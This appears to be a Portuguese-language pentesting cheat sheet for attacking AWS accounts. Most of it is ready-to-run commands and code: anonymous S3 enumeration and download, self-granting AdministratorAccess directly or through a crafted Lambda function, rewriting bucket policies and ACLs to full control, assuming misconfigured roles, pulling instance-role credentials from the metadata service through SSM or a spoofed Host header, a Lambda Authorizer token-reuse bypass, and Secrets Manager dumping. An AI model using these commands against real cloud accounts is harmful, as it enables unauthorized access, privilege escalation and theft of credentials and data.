AWS
Chaves
Tamanho e Tipos de Chaves
Access Key = 20 chars
Access Secret Key = 40 chars
Session Token = Chave temporária opicional
Prefixo de Chaves
ABIA
AWS STS Service Bearer Token
ACCA
Context-Specific Credential
AGPA
User Group
AIDA
IAM User
AIPA
Amazon EC2 Instance Profile
AKIA
Access key (Chave de longa duração importante que raramente é modificada)
ANPA
Managed Policy
ANVA
Version in a Managed Policy
APKA
Public key
AROA
Role
ASCA
Certificate
ASIA
Os IDs de chave de acesso temporário (AWS STS) usam esse prefixo, mas são exclusivos apenas em combinação com a Secret Access Key e o Session Token.
S3
O Amazon Web Services (AWS) fornece um serviço chamado S3 (Simple Storage Service), que expõe uma interface de container de armazenamento chamado de "bucket" e os arquivos dentro do bucket são chamados de "objects". O S3 fornece um armazenamento ilimitado para cada bloco e os proprietários podem usá-los para disponibilizar arquivos. Os arquivos podem ser vinculados de forma privada
(via URL com assinatura) ou pública
por meio de uma ACL (Access Control List)
configurada adequadamente ou por meio de uma ACP (Access Control Policy)
.
Todos os Buckets S3, quando configurados para hospedagem na web, recebem um domínio da AWS que você pode usar para navegar até ele sem configurar seu próprio DNS. Por exemplo, a página web http://mysther.com também pode ser visitado em http://mysther.com.s3-website-us-west-2.amazonaws.com/. Sendo assim, podemos nesse caso acessar a URL https://mysther.com.s3.amazonaws.com/ e vermos a lista de arquivos expostos.
Uma outra maneira de vermos é através do utilitário aws cli
, acesso via terminal. Supondo que temos a seguinte URL https://mysther-static-resources.s3-ap-southeast-1.amazonaws.com/,
podemos pegar somente o seu prefixo (mysther-static-resources
) e então executar o seguinte comando (altere a região, caso necessário):
Enumeração (sem autenticação)
aws s3 --no-sign-request --region ap-southeast-1 ls s3://mysther-static-resources
Caso tenha sido listado diretório, podemos acessá-la da seguinte forma:
aws s3 --no-sign-request --region ap-southeast-1 ls s3://mysther-static-resources/<directoy>/
E por fim, fazer download de arquivos
aws s3 --no-sign-request --region ap-southeast-1 cp s3://mysther-static-resources/<directory>/<file> ./
Enumeração (com autenticação)
Listando Buckets
aws s3api list-buckets
Listando objetos de um determinado Bucket
aws s3api list-objects --bucket <bucket_name>
Fazendo download de arquivos. Note que key
, é o nome do Objeto (no caso, um arquivo)
aws s3 cp s3://<bucket_name>/<key> .
OBS.: Ao localizar um Bucket, podemos acessá-lo via web, seguindo um dos seguintes padrões: https://<bucket_name>.s3.amazonaws.com/<file> ou http://<bucket_name>.s3-website-us-east-1.amazonaws.com/<file>
AWS CLI
Instalação
sudo apt install awscli
Configuração
Antes de começar, vamos configurar nossa chave de acesso. Para isso temos a maneira mais prática, que é executando o comando abaixo e depois inserindo as chaves.
aws configure
E podemos também, fazer de forma manual, criando um arquivo ~/.aws/credentials
com o conteúdo abaixo. Caso não configure essa chave, provavelmente receberá um erro do tipo: Partial credentials found in shared-credentials-file, missing: aws_secret_access_key
Para pegar as credenciais, vá no painel da AWS, clique no nome do usuário que está no canto superior à direita e depois em My Security Credentials
. Feito isso vá em Access Keys (access key ID and secret access key)
e gere uma chave.
[default]
aws_access_key_id = <key>
aws_secret_access_key = <key>
Esse processo obviamente é bem manual, já que estamos criando um arquivo manualmente e inserindo valores nele, então vamos deixar com que o próprio comando aws
faça o "trabalho sujo" por nós.
Note que, editando o arquivo manualmente, podemos inserir o valor do token temporário em aws_session_token
, já utilizando o comando aws configure
, já não é possível definir esse valor.
aws configure --profile <profile>
Feito isso, informe o Key ID
e o Access Key
. Note que o diretório ~/.aws
pode ficar um pouco diferente. O arquivo ~/.aws/credentials
que já existia, agora tem uma configuração a mais e foi criado (caso não tinha) o arquivo ~/.aws/config
, que contém a configuração das regiões.
Comandos Básicos
Pegando o UserID
e o Account Name
. Caso não defina o profile, por padrão será utilizado o profile default
. Em ~/.aws/credentials
, podemos ver o profile, que está entre colchete.
aws --profile <profile> sts get-caller-identity
Detalhes do snapshot da EC2
aws --profile <profile> ec2 describe-snapshots
Caso queira pegar um usuário em específico, é necessário adicionar o Owner, exemplo:
aws --profile <profile> ec2 describe-snapshots --owner-id <account>
Listando as permissões do S3 Bucket
aws s3api get-bucket-acl --bucket <bucket>
Listando arquivos em AWS Buckets públicos
aws s3 ls s3://<bucket_name> --no-sign-request
Caso já possua uma chave válida configurada, podemos listar os arquivos de uma forma mais prática
aws --profile <profile> s3 ls
Baixando conteúdo do Bucket
aws s3 sync s3://<bucket_name> --no-sign-request </dir/to/download/>
Fazendo upload de arquivos
aws s3 mv text.txt s3://<bucketname>
Verificando permissões de um determinado arquivo
aws s3api get-object-acl --bucket <bucket> --key <file>
IAM
O IAM (Identity and Access Management), é um serviço da Web que ajuda no controle de acessos aos recursos da AWS. É através do IAM, que podemos controlar quem é autenticado (que fez login) e autorizado (que tem permissão) a usar os recursos.
Por esse motivo, o IAM é um ponto totalmente visado a ataques, já que está centralizando e gerenciandos acessos a recursos.
Users
Informações sobre o usuário atual
aws iam get-user
Listando todos os Usuários
aws iam list-users
Não esqueça de ver as Policies que estão adicionadas aos outros usuários
aws iam list-attached-user-policies --user-name <UserName>
Criando um usuário. Note que nossa conta AWS precisa possuir tal permissão, então verifique mais abaixo como fazer para verificar as nossas políticas atuais e como fazer para anexar uma política administrativa em nosso usuário
aws iam create-user --user-name <username>
Após enumerar os usuários, crie um perfil de Login e acesse a plataforma via web
aws iam create-login-profile --user-name <username> --password <pass> --no-password-reset-required
Groups
Listando todos os Grupos
aws iam list-groups
Listando grupos de um determinado usuário
aws iam list-groups-for-user --user-name <user>
Adicionando um usuário em um grupo
aws iam add-user-to-group --group-name <group> --user-name <user>
Policies
Enumerando Políticas
aws iam list-policies
Políticas associadas em um grupo
aws iam list-attached-group-policies --group-name <grupo>
Para mais detalhes sobre uma determinada Política, pegue o ARN com o comando acima e depois execute:
aws iam get-policy --policy-arn <arn-policy>
aws iam get-policy-version --policy-arn <arn-policy> --version-id <v1>
Listando detalhes das Política de um determinado Usuário
aws iam list-user-policies --user-name <user>
Com a saída do comando acima, execute o comando abaixo mais detalhes
aws iam get-user-policy --user-name <user> --policy-name <PolicyNames>
Com a saída do comando acima, verifique se em Resource
ou em Action
há algo que possa ser interessante para escalar algum tipo de privilégio. Para executar o comando abaixo e verificarmos as Roles de uma Policy, vamos pegar como exemplo a seguinte saída: "Resource": ["arn:aws:iam::658552018120:role/Example"]
e então utilizar somente o Example
no final e executar:
aws iam list-role-policies --role-name <Example>
Agora vamos pegar o retorno de PolicyNames
do comando acima e então executar. Verifique o conteúdo em Statement
aws iam get-role-policy --role-name <Example> --policy-name <PolicyNames>
Procurando por política ARN administrativa
aws iam list-policies | grep AdministratorAccess
Após isso, nós podemos anexar a política AdministratorAccess
em nossa conta de usuário, bastando apenas pegar a <PolicyArn>
na saída do comando acima
aws iam attach-user-policy --user-name <username> --policy-arn <PolicyArn>
Verificando políticas anexadas a um determinado usuário
aws iam list-attached-user-policies --user-name <username>
Com o resultado do comando acima, utilize o valor de PolicyArn
para executar o comando abaixo, retornando assim mais detalhes sobre uma determinada Policy
aws iam get-policy --policy-arn <PolicyArn>
Verificando certificado assinado do usuário
aws iam list-signing-certificates --user-name <user>
Verificando por chave públic SSH do usuário.
aws iam list-ssh-public-keys --user-name <user>
Com o resultado do comando acima, utilize o valor de SSHPublicKeyId
para executar o próximo comando
aws iam get-ssh-public-key --user-name <user> --encoding PEM --ssh-public-key-id <SSHPublicKeyId>
Verificando se um determinado usuário possui login na console
aws iam get-login-profile --user-name <user>
Verificando políticas de um determinado grupo
aws iam list-group-policies --group-name <group>
Roles
Enumerando as Roles
aws iam list-roles
Detalhes de uma determinada Role
aws iam get-role --role-name <RoleName>
Verificando as Policies de uma Role
aws iam list-role-policies --role-name <RoleName>
Assumindo uma role
aws sts assume-role --role-arn <arn:aws:iam::658552018120:role/Example> --role-session-name <example_test>
Execute o próximo comando, de acordo com a saída do comando anterior
export AWS_ACCESS_KEY_ID=<AccessKeyId>
export AWS_SECRET_ACCESS_KEY=<SecretAccessKey>
export AWS_SESSION_TOKEN=<SessionToken>
Note que fazendo isso, você substituindo seus acessos, então caso queria voltar ao normal, utilize o comando abaixo:
unset AWS_ACCESS_KEY_ID
unset AWS_SECRET_ACCESS_KEY
unset AWS_SESSION_TOKEN
Misconfigured Trust Policy
aws sts assume-role --role-arn arn:aws:iam::<aws_account>:role/<role> --role-session-name ad_logging
Defina as variáveis, sendo os valores de acordo com o resultado do comando cima
export AWS_ACCESS_KEY_ID=<AccessKeyId>
export AWS_SECRET_ACCESS_KEY=<SecretAccessKey>
export AWS_SESSION_TOKEN=<SessionToken>
Verificando se as configurações
aws sts get-caller-identity
Verificando se há alguma política com s3 disponível
aws iam list-attached-role-policies --role-name <role_name>
Caso possua um s3 disponível, execute o comando abaixo para listar o conteúdo disponível nessa s3
aws s3 ls
PACU
Instalação
pip3 install -U pacu
Inicializando
pacu
Definindo as chaves
set_keys
Brute Force em Users
run iam__enum_users --role-name a4 --account-id <999999999999> --word-list <wordlist.txt>
Brute Force em Roles
run iam__enum_roles --role-name a4 --account-id <999999999999> --word-list <wordlist.txt>
Bucket
Listando Buckets
aws s3api list-buckets
aws --endpoint http://<site.com>:<port> s3api list-buckets
Listando objetos/arquivos de um determinado Bucket
aws s3api list-objects --bucket <bucket_name>
aws --endpoint http://<site.com>:<port> s3 ls s3://<bucket_name>
Baixando um bucket completo
aws --profile <profile> s3 sync s3://<bucket_name> ./
Fazendo download de arquivo que está armazenado em um determinado Bucket
aws s3 cp s3://<bucket_name>/<file> .
aws --endpoint http://<site.com>:<port> s3 cp s3://<bucket_name>/<file> ./
Fazendo upload de arquivo
# Arquivo novo
aws --endpoint http://<site.com>:<port> s3 cp <file> s3://<bucket_name>/
# Substituindo conteúdo de um arquivo existente
aws --endpoint http://<site.com>:<port> s3 cp <file> s3://<bucket_name>/<file>
Deletando arquivo remoto
aws --endpoint http://<site.com>:<port> s3 rm s3://<bucket_name>/<file>
Verificando as Policies de um determinado Bucket. Em algumas ocasiões, podemos ver os nomes dos arquivos, o que pode ser útil quando não temos acesso a leitura dos objetos do Bucket. Em outros casos, podemos ver configurações onde é possível ter acesso por exemplo, utilizando somente um determinado User Agent.
aws s3api get-bucket-policy --bucket <bucket_name> --output text | jq
aws --endpoint http://<site.com>:<port> s3api get-bucket-policy --bucket <bucket_name>
Caso possua permissão para atualizar as políticas, salve o resultado do comando acima e substitua o Deny
por Allow
e deixe partes como s3:GetBucketPolicy
como s3:*
. Também altere o Resource
colocando um *
no final, caso esteja apontando para algum arquivo em específico.
Agora faça upload do json modificado.
aws s3api put-bucket-policy --bucket <bucket_name> --policy file://<file.json>
Alterando ACL do Bucket
Primeiro precisamos baixar a ACL de um determinado bucket e salvar a saída em um arquivo json
aws s3api get-bucket-acl --bucket <bucket_name> > <file-acl.json>
Agora basta editar o arquivo, alterando o valor de Permission
para FULL_CONTROL
e depois atualizar a ACL atavés do comando abaixo:
aws s3api put-bucket-acl --bucket <bucket_name> --access-control-policy file://<file-acl.json>
Para verificar se deu certo utilize o segundo comando acima, porém sem jogar a saída para um arquivo json
Alterando ACL do Objeto em um Bucket
Primeiro precisamos baixar a ACL de um determinado objeto (arquivo) do bucket e salvar a saída em um arquivo json
aws s3api get-object-acl --bucket <bucket_name> --key <file> > <output-file.json>
Agora basta editar o arquivo, alterando o valor de Permission
para FULL_CONTROL
e depois atualizar a ACL atavés do comando abaixo:
aws s3api put-object-acl --bucket <bucket_name> --key <file> --access-control-policy file://<output-file.json>
C2
Analisando instâncias
aws ec2 describe-instances
Pegando o AMI ID
aws ec2 describe-images --owners amazon --filters 'Name=name,Values=amzn-ami-hvm-*-x86_64-gp2' 'Name=state,Values=available' --output json | jq -r '.Images | sort_by(.CreationDate) | last(.[]).ImageId'
Analisando subnets (aqui podemos encontrar o valor de SubnetId
)
aws ec2 describe-subnets
Listando grupos de segurança
aws ec2 describe-security-groups (aqui podemos encontrar o valor de `GroupId`, por exemplo, `sg-12ad125a1b78c60`)
Listando perfis de instancias (aqui podemos encontrar o valor de InstanceProfileName
)
aws iam list-instance-profiles
Inicializando uma EC2
aws ec2 run-instances --subnet-id <SubnetId> --image-id <ami-id> --iam-instance-profile Name=<InstanceProfileName> --instance-type t2.micro --security-group-ids "<GroupId>"
Com a saída do comando acima, atente-se ao valor de InstanceId
e utilize-o abaixo para executarmos um comando no OS do EC2. No primeiro exemplo, estamos pegando as chaves de acesso e no segundo exemplo, apenas executando o comando id
. Não se esqueça de altera o roleName
, como fizemos com o <Example>
# Pegando chaves de acesso
aws ssm send-command --document-name "AWS-RunShellScript" --parameters 'commands=["curl http://169.254.169.254/latest/meta-data/iam/security-credentials/<roleName>/"]' --targets "Key=instanceids,Values=<InstanceId>"
# id
aws ssm send-command --document-name "AWS-RunShellScript" --parameters 'commands=["<command>"]' --targets "Key=instanceids,Values=<InstanceId>"
Note que apesar de termos executado o comando, não obtemos a sua saída. Para isso, precisamos realizar mais uma requisição, onde podemos ver ser o output do comando em StandardOutputContent
. Atente-se ao CommandId
que foi retornado no comando anterior
aws ssm get-command-invocation --command-id "<CommandId>" --instance-id "<InstanceId>"
Lambda
Listando Function Lambda
aws lambda list-functions
Para criar uma Function Lambda, primeira crie um arquivo chamado aws.py
com o conteúdo abaixo. Isso irá adicionar um determinado usuário a Política de Administradores.
import boto3
def handler(event, context):
iam = boto3.client("iam")
response = iam.attach_user_policy(
UserName="<user>", PolicyArn="arn:aws:iam::aws:policy/AdministratorAccess"
)
return response
Compacte o arquivo criado:
zip aws.zip aws.py
Crie a Function Lambda através do comando
aws lambda create-function --function-name aws-function --runtime python3.8 --zip-file fileb://aws.zip --handler aws.handler --role <arnRole>
Agora execute a Function criada
aws lambda invoke --function-name aws-function <output_file.txt>
Se ver novamente nas Policies do usuário, terá o AdministratorAccess
aws iam list-attached-user-policies --user-name <user>
Lambda Authorizer
O Lambda Authorizer é um recurso do API Gateway que usa uma função do Lambda para controlar o acesso à API. Com base nas informações fornecidas na solicitação, ou seja, tokens, parâmetros de solicitação etc, a função Lambda retorna uma política que permite ou nega o acesso à API.
Um ponto que podemos fazer para driblar isso é, acessar a URL http://ab.cd-api.us-east-1.amazonaws.com/dev/status com algum token aleatório para que seja validado e após isso,utiizar esse que foi validado em http://ab.cd-api.us-east-1.amazonaws.com/dev/admin. Exemplo:
$TOKEN=$RANDOM
curl 'http://ab.cd-api.us-east-1.amazonaws.com/dev/status' -H "Authorization: $TOKEN"
curl 'http://ab.cd-api.us-east-1.amazonaws.com/dev/admin' -H "Authorization: $TOKEN"
DynamoDB
Select
Listando tabelas do DynamoDB Server
aws --endpoint http://<ip>:4567 dynamodb list-tables
Verificando a estrutura de uma determinada tabela
aws --endpoint http://<ip>:4567 dynamodb describe-table --table <table>
Lendo conteúdo de uma determinada tabela
aws --endpoint http://<ip>:4567 dynamodb scan --table <table>
Para pesquisar por um valor específico, crie um arquivo chamado find.json
com o conteúdo abaixo, altere a chave S
com o respectivo index, caso seja necessário:
{
":value": {"S": "<value>"}
}
Agora execute o comando de busca
aws --endpoint http://<ip>:4567 dynamodb scan --table users --filter-expression "<field_to_filter> = :value" --projection-expression "<field_to_return>" --expression-attribute-values file://</path/to/find.json>
Outra maneira de pesquisar, é da forma abaixo, porém aqui estamos filtrando por um campo diferente
aws --endpoint http://<ip>:4567 dynamodb query --table <table> --key-condition-expression "<field_to_filter> = :value" --expression-attribute-value file://</path/to/find.json>
Caso o json possua mais, valores, podemos organizá-lo da seguinte forma:
{
":value1": {"S": "<value>"},
":value2": {"S": "<value>"}
}
Agora em nossa --key-condition-expression, podemos deixa no seguinte padrão:
... --key-condition-expression "<field_to_filter> = :value1 and <field_to_filter> = :value2" ...
Insert
Crie um arquivo chamado insert.json
com o seguinte valor (altere o nome das chaves e valores):
{
"<field>": {"S":"<value>"},
"<field>": {"S":"<value>"}
}
Agora execute
aws --endpoint http://<ip>:4567 dynamodb put-item --table <table> --item file://</path/to/insert.json>
Para verificar se realmente deu certo, crie um arquivo chamado search.json
com o seguinte conteúdo (altere o field
e o value
para ser igual o foi inserido anteriormente):
{
"<field>": {"S": "<value>"}
}
Agora realize a pesquisa com o comando
aws --endpoint http://<ip>:4567 dynamodb get-item --table <table> --key file://</path/to/search.json>
Update
Podemos também, atualizar um objeto. Para isso vamos criar um arquivo chamado key.json
definindo o index (field) e seu respectivo valor, seguindo o seguinte padrão:
{
"<field>": {"S": "<value>"}
}
Agora iremos criar um segundo arquivo chamado value.json
, que irá conter o novo valor que iremos atribuir para o registro que der "match" com a condição do arquivo key.json
criado acima
{
":value": {"S": "<new_value>"}
}
Por fim, execute o comando para atualizar o banco de dados
aws --endpoint http://<ip>:4567 dynamodb update-item --table <table> --key file://</path/to/key.json> --update-expression "SET <field_to_change> = :value" --expression-attribute-values file://</path/to/value.json>
Para verificar se deu certo, execute
aws --endpoint http://<ip>:4567 dynamodb get-item --table <table> --key file://</path/to/key.json>
Delete
Deletando registro de uma tabela
aws --endpoint http://<ip>:4567 dynamodb delete-item --table <table> --key file:///<path/<to>/<file.json>
Deletando uma tabela
aws --endpoint http://<ip>:4567 dynamodb delete-table --table <table>
Bucket Finder
Procura por buckets que estão públicos e baixa o seu conteúdo.
./bucket_finder.rb --region us <wordlist> --download
Pegando Chaves
Ao acessar um servidor web hospedado na AWS, utilize o 169.254.169.254 no header Host
para pegar dados sensíveis, incluindos as chaves AWS
curl http://<ip>/ -H 'Host: 169.254.169.254'
curl http://<ip>/latest/meta-data/iam/security-credentials/<role_name> -H 'Host: 169.254.169.254'
Secret Managers
Configurando o AWS
export AWS_ACCESS_KEY_ID = <aws_access_key_id>
export AWS_SECRET_ACCESS_KEY = <aws_secret_access_key>
export AWS_SESSION_TOKEN = <aws_session_token>
Enumerando os Callers Identity
aws sts get-caller-identity
Listando os Secret Managers
aws secretsmanager list-secrets --region <us-east-1>
Alterr o <name>
abaixo pela retorno de Name
no comando anterior
aws secretsmanager get-secret-value --secret-id <name>
IMDS
É possível acessar metadados de instância em uma instância em execução utilizando o IMDSv1 (método de solicitação/resposta) ou o IMDSv2 (método orientado a sessões). Os cabeçalhos PUT ou GET são exclusivos do IMDSv2. Se esses cabeçalhos estiverem presentes na solicitação, a solicitação será destinada ao IMDSv2. Se nenhum cabeçalho estiver presente, presume-se que a solicitação seja destinada ao IMDSv1.
Ao acessarmos a URL abaixo, podemos receber um 401 - Unauthorized
curl http://169.254.169.254/latest/meta-data
Porém podemos contarnar isso com o comando abaixo, onde iremos pegar o token e jogar na variável TOKEN
:
TOKEN=`curl -X PUT "http://169.254.169.254/latest/api/token" -H
"X-aws-ec2-metadata-token-ttl-seconds: 21600"`
Agora com o token em mãos, vamos pegar todos os serviços
curl -H "X-aws-ec2-metadata-token: $TOKEN" http://169.254.169.254/latest/meta-data/
Feito isso, podemos navegar nos diretórios localizados, como no exemplo abaixo, no diretório iam
(caso exista). Dentro do diretório iam
irão existir mais arquivos e diretórios que podem ser acessados, então vá sempre adicionando eles no final da URL
curl http://169.254.169.254/latest/meta-data/iam/ -H "X-aws-ec2-metadata-token: $TOKEN"
Acessando via Postman com Access Key e Access Secret Key
Depois de ter em mãos o Access Key (chave com o prefixo AKIA
) e o Access Secret Key, abra o Postman e na aba de autenticação, selecione AWS Signature
. Insira então as duas chaves, a região (pro exemplo us-east-1
) e o Service Name, que podemos pegar na URL, onde temos o valor execute-api
, para a URL. https://a2s4f3fcl6.execute-api.us-east-1.amazonaws.com/default/
Sites
# Pesquisa pública da Open Amazon S3 Buckets
https://buckets.grayhatwarfare.com/
# Explicação sobre a AWS
https://labs.detectify.com/2017/07/13/a-deep-dive-into-aws-s3-access-controls-taking-full-control-over-your-assets/
# Gerador de Policies
https://awspolicygen.s3.amazonaws.com/policygen.html
# PACU
https://github.com/RhinoSecurityLabs/pacu1
Last updated
Was this helpful?